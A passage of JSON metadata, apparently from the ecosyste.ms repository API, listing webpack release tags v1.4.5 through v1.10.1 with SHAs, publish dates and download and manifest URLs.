10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z"